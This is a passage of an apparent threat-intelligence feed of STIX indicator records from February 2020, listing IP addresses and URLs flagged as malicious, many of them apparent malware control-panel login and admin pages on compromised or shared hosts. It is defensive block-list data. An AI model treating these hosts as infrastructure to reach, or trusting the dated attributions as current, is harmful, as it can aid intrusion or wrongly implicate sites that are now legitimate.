CyberCrime","id":"indicator--5b354705-abe0-4b58-b088-aba7ddc92d6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-35"],"modified":"2020-02-06T02:13:26.405Z","name":"mal_url: http://155.94.210.79/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://155.94.210.79/login']","type":"indicator","valid_from":"2020-02-06T02:13:26.405Z"} +{"created":"2020-02-06T02:14:04.592Z","description":"TS ID: 55290730804; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--6f406e7c-e62d-4431-b7eb-d8bc42d48b54","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:14:04.592Z","name":"mal_url: http://lf9a7e2b.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lf9a7e2b.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:14:04.592Z"} +{"created":"2020-02-06T02:14:13.434Z","description":"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:14:13.434Z","name":"mal_url: http://5.188.60.16/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.16/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.434Z"} +{"created":"2020-02-06T02:14:13.474Z","description":"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-16"],"modified":"2020-02-06T02:14:13.474Z","name":"mal_ip: 137.74.20.60","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '137.74.20.60']","type":"indicator","valid_from":"2020-02-06T02:14:13.474Z"} +{"created":"2020-02-06T02:14:13.506Z","description":"TS ID: 55290730793; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a2c76402-f9d0-4ea1-9ed0-b035bce4c7a6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-06T02:14:13.506Z","name":"mal_url: http://tikkies.eu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tikkies.eu/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.506Z"} +{"created":"2020-02-06T02:14:14.285Z","description":"TS ID: 55290730805; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--2e110e0c-f7af-4738-bed2-057bebad6f44","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:14:14.285Z","name":"mal_url: http://lb1a9935.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lb1a9935.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:14:14.285Z"} +{"created":"2020-02-06T02:14:30.841Z","description":"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime","id":"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-06T02:14:30.841Z","name":"mal_url: http://69.61.38.147/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://69.61.38.147/login']","type":"indicator","valid_from":"2020-02-06T02:14:30.841Z"} +{"created":"2020-02-07T01:58:49.531Z","description":"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.531Z","name":"mal_url: http://107.175.150.73/~giftioz/.golob/ds.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.golob/ds.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.531Z"} +{"created":"2020-02-07T01:58:49.782Z","description":"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--44a6ba7f-2847-45c5-b4f3-452582094240","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.782Z","name":"mal_url: http://107.175.150.73/~giftioz/.jonovis/xr.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.jonovis/xr.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.782Z"} +{"created":"2020-02-07T01:59:00.621Z","description":"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime","id":"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-07T01:59:00.621Z","name":"mal_url: http://194.32.79.80/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://194.32.79.80/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-07T01:59:00.621Z"} +{"created":"2020-02-07T02:01:59.646Z","description":"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--a8895396-ac11-49f3-bb81-6e854b871870","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:01:59.646Z","name":"mal_url: http://107.175.150.73/~giftioz/.fotoci/ji.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.fotoci/ji.php']","type":"indicator","valid_from":"2020-02-07T02:01:59.646Z"} +{"created":"2020-02-07T02:02:24.529Z","description":"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:02:24.529Z","name":"mal_url: http://107.175.150.73/~giftioz/.hokbi/cv.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.hokbi/cv.php']","type":"indicator","valid_from":"2020-02-07T02:02:24.529Z"} +{"created":"2020-02-08T14:02:11.92Z","description":"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--0e0304f5-9735-4c6d-a860-95633369db34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:02:11.92Z","name":"mal_ip: 91.215.169.50","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.169.50']","type":"indicator","valid_from":"2020-02-08T14:02:11.92Z"} +{"created":"2020-02-08T14:02:14.399Z","description":"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-08T14:02:14.399Z","name":"mal_ip: 47.254.179.14","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.254.179.14']","type":"indicator","valid_from":"2020-02-08T14:02:14.399Z"} +{"created":"2020-02-08T14:02:17.271Z","description":"TS ID: 55298068887; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--257cd2f9-ce06-4091-83e2-63d61b7e8bfa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-08T14:02:17.271Z","name":"mal_url: http://smineolo39wings.in/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smineolo39wings.in/login']","type":"indicator","valid_from":"2020-02-08T14:02:17.271Z"} +{"created":"2020-02-08T14:02:23Z","description":"TS ID: 55298071788; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--8438ae84-2b7d-4fea-b1cd-fbec85ea3e58","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-08T14:02:23Z","name":"mal_url: http://go.trust-oot.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://go.trust-oot.info/login']","type":"indicator","valid_from":"2020-02-08T14:02:23Z"} +{"created":"2020-02-08T14:02:23.507Z","description":"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-08T14:02:23.507Z","name":"mal_url: http://178.62.186.112/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://178.62.186.112/login']","type":"indicator","valid_from":"2020-02-08T14:02:23.507Z"} +{"created":"2020-02-08T14:02:23.547Z","description":"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:02:23.547Z","name":"mal_ip: 5.188.231.89","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.188.231.89']","type":"indicator","valid_from":"2020-02-08T14:02:23.547Z"} +{"created":"2020-02-08T14:02:33.679Z","description":"TS ID: 55298069345; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1aa4e592-6c78-43e8-b47c-2494a948d25c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-08T14:02:33.679Z","name":"mal_url: http://f0391897.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391897.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:02:33.679Z"} +{"created":"2020-02-08T14:02:53.996Z","description":"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-08T14:02:53.996Z","name":"mal_ip: 190.14.38.202","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '190.14.38.202']","type":"indicator","valid_from":"2020-02-08T14:02:53.996Z"} +{"created":"2020-02-08T14:02:57.507Z","description":"TS ID: 55298070037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--46c21251-c655-40c1-896d-2f4712091b7b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-08T14:02:57.507Z","name":"mal_url: http://nikitakoteqka1.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nikitakoteqka1.myjino.ru/login']","type":"indicator","valid_from":"2020-02-08T14:02:57.507Z"} +{"created":"2020-02-08T14:02:59.236Z","description":"TS ID: 55298072047; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--7921e9e8-393c-4b0d-888f-bea034112f06","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:02:59.236Z","name":"mal_url: http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:02:59.236Z"} +{"created":"2020-02-08T14:02:59.246Z","description":"TS ID: 55298071436; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a59774c5-c288-44a0-9eab-28d93c5d0ab4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:02:59.246Z","name":"mal_url: http://100stuff.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://100stuff.site/login']","type":"indicator","valid_from":"2020-02-08T14:02:59.246Z"} +{"created":"2020-02-08T14:02:59.31Z","description":"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:02:59.31Z","name":"mal_ip: 81.4.100.75","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '81.4.100.75']","type":"indicator","valid_from":"2020-02-08T14:02:59.31Z"} +{"created":"2020-02-08T14:02:59.432Z","description":"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-08T14:02:59.432Z","name":"mal_ip: 8.209.78.16","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '8.209.78.16']","type":"indicator","valid_from":"2020-02-08T14:02:59.432Z"} +{"created":"2020-02-08T14:03:17.953Z","description":"TS ID: 55298072311; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--86c43dc8-a27e-4f30-a29e-ba174f0a03ef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-08T14:03:17.953Z","name":"mal_url: http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:03:17.953Z"} +{"created":"2020-02-08T14:03:21.626Z","description":"TS ID: 55298071960; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d900b770-4f2f-4597-ba97-a3e62646eca8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:03:21.626Z","name":"mal_url: http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:03:21.626Z"} +{"created":"2020-02-08T14:03:23.941Z","description":"TS ID: 55298070427; iType: mal_url; State: active; Org: SBCLOUD; Source: CyberCrime","id":"indicator--be5fb697-b554-4042-8185-f4148a5d02a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-08T14:03:23.941Z","name":"mal_url: http://boomcoins.ml/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://boomcoins.ml/login']","type":"indicator","valid_from":"2020-02-08T14:03:23.941Z"} +{"created":"2020-02-08T14:03:34.136Z","description":"TS ID: 55298071042; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--31a6a6c3-f385-421f-9ebb-d5cdced1dfd5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:03:34.136Z","name":"mal_url: http://asstubevideos.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://asstubevideos.com/login']","type":"indicator","valid_from":"2020-02-08T14:03:34.136Z"} +{"created":"2020-02-08T14:03:34.507Z","description":"TS ID: 55298069289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--8c9846cd-2a0b-40c3-91f2-5893c05b1560","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-08T14:03:34.507Z","name":"mal_url: http://f0397413.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0397413.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:34.507Z"} +{"created":"2020-02-08T14:03:42.075Z","description":"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:03:42.075Z","name":"mal_ip: 45.145.0.14","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.145.0.14']","type":"indicator","valid_from":"2020-02-08T14:03:42.075Z"} +{"created":"2020-02-08T14:03:42.298Z","description":"TS ID: 55298069324; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--8d463a9a-c285-4af6-91e8-bfd7e65d820f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-08T14:03:42.298Z","name":"mal_url: http://f0396512.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396512.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:42.298Z"} +{"created":"2020-02-08T14:03:46.901Z","description":"TS ID: 55298070290; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--bf76b431-6b24-4b63-89d6-4f026a2e5169","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-08T14:03:46.901Z","name":"mal_url: http://j1043204.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1043204.myjino.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:46.901Z"} +{"created":"2020-02-08T14:03:47.108Z","description":"TS ID: 55298069358; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--646c9b00-80f7-4457-b2bc-1da854c211d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-08T14:03:47.108Z","name":"mal_url: http://f0387320.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387320.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:47.108Z"} +{"created":"2020-02-08T14:03:50.674Z","description":"TS ID: 55298072749; iType: mal_url; State: active; Org: SpaceWeb CJSC; Source: CyberCrime","id":"indicator--48ad83a8-cec1-4d85-a9fd-1b7f9308cb6a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-08T14:03:50.674Z","name":"mal_url: http://rqx10504bc.temp.swtest.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rqx10504bc.temp.swtest.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-08T14:03:50.674Z"} +{"created":"2020-02-08T14:03:53.621Z","description":"TS ID: 55298069555; iType: mal_url; State: active; Org: OOO Network of data-centers Selectel; Source: CyberCrime","id":"indicator--8e98212b-20f2-404f-804b-8ab7519c5683","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-08T14:03:53.621Z","name":"mal_url: http://j6g3fzp.5k5.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j6g3fzp.5k5.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-08T14:03:53.621Z"} +{"created":"2020-02-08T14:03:58.176Z","description":"TS ID: 55298069681; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--395e83ba-96c1-45d2-b4b2-c065af5547fe","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:03:58.176Z","name":"mal_url: http://stableupdater.ru.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://stableupdater.ru.com/login']","type":"indicator","valid_from":"2020-02-08T14:03:58.176Z"} +{"created":"2020-02-08T14:03:58.41Z","description":"TS ID: 55298072652; iType: mal_url; State: active; Org: Netrouting; Source: CyberCrime","id":"indicator--84dceb2a-fb38-4d98-9005-7f05460e8f3a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-02-08T14:03:58.41Z","name":"mal_url: http://209.182.217.85/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://209.182.217.85/auth.php']","type":"indicator","valid_from":"2020-02-08T14:03:58.41Z"} +{"created":"2020-02-08T14:04:30.627Z","description":"TS ID: 55298073012; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--ca97a773-4de3-4c9d-8f4c-b7350a615c45","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-08T14:04:30.627Z","name":"mal_url: http://fentq.org/x/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fentq.org/x/panel/admin.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.627Z"} +{"created":"2020-02-08T14:04:30.659Z","description":"TS ID: 55298072708; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--d0653208-3d17-48c8-a47d-a6dede383ad8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-08T14:04:30.659Z","name":"mal_url: http://castmart.ga/~zadmin/beta/aps/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/beta/aps/login.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.659Z"} +{"created":"2020-02-08T14:04:30.733Z","description":"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--7873494f-24fb-42a6-ae17-299b9825e220","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:04:30.733Z","name":"mal_ip: 162.241.6.97","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.6.97']","type":"indicator","valid_from":"2020-02-08T14:04:30.733Z"} +{"created":"2020-02-08T14:04:30.81Z","description":"TS ID: 55298072245; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--14e760f3-eb76-412c-ab7b-8267bd65deb5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-08T14:04:30.81Z","name":"mal_url: http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.81Z"} +{"created":"2020-02-08T14:04:30.84Z","description":"TS ID: 55298072104; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--8a5aa5ab-e8ec-4641-9cfb-179df3bede39","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-08T14:04:30.84Z","name":"mal_url: http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.84Z"} +{"created":"2020-02-08T14:04:30.927Z","description":"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:04:30.927Z","name":"mal_url: http://45.145.0.14/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.145.0.14/login']","type":"indicator","valid_from":"2020-02-08T14:04:30.927Z"} +{"created":"2020-02-08T14:04:35.541Z","description":"TS ID: 55298071733; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--cd3bea2d-dd64-463e-ae03-2a582c2261f2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:04:35.541Z","name":"mal_url: http://trust-oot.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trust-oot.info/login']","type":"indicator","valid_from":"2020-02-08T14:04:35.541Z"} +{"created":"2020-02-08T14:04:35.641Z","description":"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-08T14:04:35.641Z","name":"mal_ip: 217.8.117.66","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.66']","type":"indicator","valid_from":"2020-02-08T14:04:35.641Z"} +{"created":"2020-02-08T14:04:37.657Z","description":"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d2987902-59e6-4667-b011-f20e93e283d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:04:37.657Z","name":"mal_url: http://81.4.100.75/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://81.4.100.75/login']","type":"indicator","valid_from":"2020-02-08T14:04:37.657Z"} +{"created":"2020-02-08T14:04:41.785Z","description":"TS ID: 55298072117; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--093718d8-bb0e-4816-ab4b-c97cb95d5531","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-08T14:04:41.785Z","name":"mal_url: http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:41.785Z"} +{"created":"2020-02-08T14:04:43.759Z","description":"TS ID: 55298071859; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--dfdca2f0-75cc-4e33-9045-e2ba136c0183","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:04:43.759Z","name":"mal_url: http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:43.759Z"} +{"created":"2020-02-08T14:04:43.783Z","description":"TS ID: 55298070283; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0e501865-d0a0-493b-8302-02efe0f2c5d1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-08T14:04:43.783Z","name":"mal_url: http://kmfjlool.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kmfjlool.xyz/login']","type":"indicator","valid_from":"2020-02-08T14:04:43.783Z"} +{"created":"2020-02-09T05:09:33.689Z","description":"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: 